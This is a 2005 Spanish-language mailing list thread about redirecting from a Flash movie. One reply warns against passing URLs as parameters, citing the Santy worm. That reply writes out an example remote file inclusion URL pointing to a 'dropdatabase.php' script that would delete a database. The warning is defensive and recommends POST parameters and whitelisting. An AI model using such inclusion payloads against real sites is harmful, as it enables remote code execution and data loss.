Re: [Ovillo] Redireccionamiento
No te aconsejo que pases url por parametro. Hace un tiempo, se encontro un gusano escrito en Perl llamado PHP/Santy.A.worm. Afecto a todos los usuarios del famoso PhpBB version 2.0.10 y con la ayuda de google: http://www.ulfix.com/index.php?option=com_content&task=view&id=425&Itemid=113 Este basicamente se aprovecha de la vulnerabilidad de utilizar includes en PHP. Esto es, imagina que tenemos la siguiente estructura en PHP: Hasta aqui todo parece bien. Imagina que por el navegador pongo esto: http://www.midominio.com/presentacion.swf?link=http://tasimtasim.co.il/texts.php?text=1 Genial! se abre en la parte central el contenido incrustado en PHP. Hemos recuperado un parametro y lo abrimos en el código PHP. Pues ahora tengo ganas de borrar la base de datos: http://www.midominio.com/presentacion.swf?link=http://www.miotrodominio.com/dropdatabase.php Te aseguro que es facil averiguar el nombre de la base de datos y/o realizar consultas SQL mediante el SQLInjection. Hemos ejecutado un codigo remoto, ejecutado por el usuario que ejecuta la web y acabamos de borrar la base de datos (si la hubiera). Pues como este ejemplo, muchos. Lo mejor es pasar los parametros de un formulario por FORM POST y no por URL (GET). Si es necesario, comprueba que existan en una lista antes de realizar un include. Si este no es tu caso, pues genial, pero puede que algun dia si. Sino espero haber ayudadoa alguien o haberme explicado lo mejor posible. Ya sabeis si teneis alguna duda, contactadme. El día 26/06/05, Camilo Kawerín <[EMAIL PROTECTED]> escribió: > > Hola Shmuel, > > Shmuel Gershon escribió: > > Hola. > > > > No se si tiene que ver con standards... pero: > > > > En el sitio del que les hable en un pasado, tenemos un flash que nos han > > hecho, que lleva un link a la pagina > > http://tasimtasim.co.il/rentacar.html > > En rentacar.html, hay un meta refresh que redirecciona la pagina a > > http://tasimtasim.co.il/texts.php?text=1. > > Es asi por que no queriamos complicar al designer del flash con el link > > mas complicado, y por que me parece que asi tenemos control sobre a > > donde lleva el flash mismo si se decide cambiar el modo como esta > > estructurado el sitio. > > > > O sea, me parece que linkar a texts.php?text=1 es muy poco flexible, y > > que linkar a rentacar.html nos deja hacer lo que queramos. > > Principalmente por que no hizimos el flash nosotros, y no tenemos los > > archivos FLA, solo SWF. > > > > La pregunta: > > Es incorrecto hacer redirecciones? > > Esta bien lo que se hizo en este sitio? > > > > Quizás la forma más apropiada era pasar la dirección de destino como > parámetro de la película: > "presentacion.swf?link=http://tasimtasim.co.il/texts.php?text=1";. De esa > forma podían cambiarla en cualquier momento. > Luego, si no queda más remedio que el redireccionamiento, creo que lo > más seguro sería hacerlo en el servidor con php. > > Saludos, > > -- > Camilo Kawerín > 27Sur comunicación & diseño > http://www.27sur.com > ___ > Lista de distribución Ovillo > Para escribir a la lista, envia un correo a Ovillo@lists.ovillo.org > Puedes modificar tus datos o desuscribirte en la siguiente dirección: > http://ovillo.org/mailman/listinfo/ovillo > -- Salu2: MARTIN desde Valencia (ESPAÑA) ___ Lista de distribución Ovillo Para escribir a la lista, envia un correo a Ovillo@lists.ovillo.org Puedes modificar tus datos o desuscribirte en la siguiente dirección: http://ovillo.org/mailman/listinfo/ovillo
RE: [Ovillo] Redireccionamiento
> Sigo la duda de la siguiente forma: > 1) Entiendo que no hay mal en hacer redirecciónes... > 2) Como deben ser hechas? > 2.1) Entiendo que las que se hace en Server-Side son mejores pues el > Client ni se dá cuenta... O no es cierto? > > SGershon te respondo con un link del w3c dónde explica problemas y soluciones para esto de las redirecciones. http://www.w3.org/QA/Tips/reback saludos Carlos Campderros Estrada UBUNTU Fòrum Mundial de Xarxes de la Societat Civil Carlos.campderros (arroba) ubuntu.upc.edu (34) 93 413 77 74 ___ Lista de distribución Ovillo Para escribir a la lista, envia un correo a Ovillo@lists.ovillo.org Puedes modificar tus datos o desuscribirte en la siguiente dirección: http://ovillo.org/mailman/listinfo/ovillo
RE: [Ovillo] Redireccionamiento
> -Original Message- > From: Camilo Kawerín > Sent: Domingo, 26 de Junio de 2005 09:44 a.m. > > Quizás la forma más apropiada era pasar la dirección de destino como > parámetro de la película: > "presentacion.swf?link=http://tasimtasim.co.il/texts.php?text=1";. De esa > forma podían cambiarla en cualquier momento. > Luego, si no queda más remedio que el redireccionamiento, creo que lo > más seguro sería hacerlo en el servidor con php. > > Saludos, Camilo Kawerín Humm... Espera encuanto atrápe a ese designer, que no nos explicó esa opción de los parámetros. Y yo sabia que Flashes reciben parametros, pero no me lo pensé al momento ni hasta ahora. Gracias por tu sugerência! Sigo la duda de la siguiente forma: 1) Entiendo que no hay mal en hacer redirecciónes... 2) Como deben ser hechas? 2.1) Entiendo que las que se hace en Server-Side son mejores pues el Client ni se dá cuenta... O no es cierto? SGershon ___ Lista de distribución Ovillo Para escribir a la lista, envia un correo a Ovillo@lists.ovillo.org Puedes modificar tus datos o desuscribirte en la siguiente dirección: http://ovillo.org/mailman/listinfo/ovillo
Re: [Ovillo] Redireccionamiento
Hola Shmuel, Shmuel Gershon escribió: Hola. No se si tiene que ver con standards... pero: En el sitio del que les hable en un pasado, tenemos un flash que nos han hecho, que lleva un link a la pagina http://tasimtasim.co.il/rentacar.html En rentacar.html, hay un meta refresh que redirecciona la pagina a http://tasimtasim.co.il/texts.php?text=1. Es asi por que no queriamos complicar al designer del flash con el link mas complicado, y por que me parece que asi tenemos control sobre a donde lleva el flash mismo si se decide cambiar el modo como esta estructurado el sitio. O sea, me parece que linkar a texts.php?text=1 es muy poco flexible, y que linkar a rentacar.html nos deja hacer lo que queramos. Principalmente por que no hizimos el flash nosotros, y no tenemos los archivos FLA, solo SWF. La pregunta: Es incorrecto hacer redirecciones? Esta bien lo que se hizo en este sitio? Quizás la forma más apropiada era pasar la dirección de destino como parámetro de la película: "presentacion.swf?link=http://tasimtasim.co.il/texts.php?text=1";. De esa forma podían cambiarla en cualquier momento. Luego, si no queda más remedio que el redireccionamiento, creo que lo más seguro sería hacerlo en el servidor con php. Saludos, -- Camilo Kawerín 27Sur comunicación & diseño http://www.27sur.com ___ Lista de distribución Ovillo Para escribir a la lista, envia un correo a Ovillo@lists.ovillo.org Puedes modificar tus datos o desuscribirte en la siguiente dirección: http://ovillo.org/mailman/listinfo/ovillo
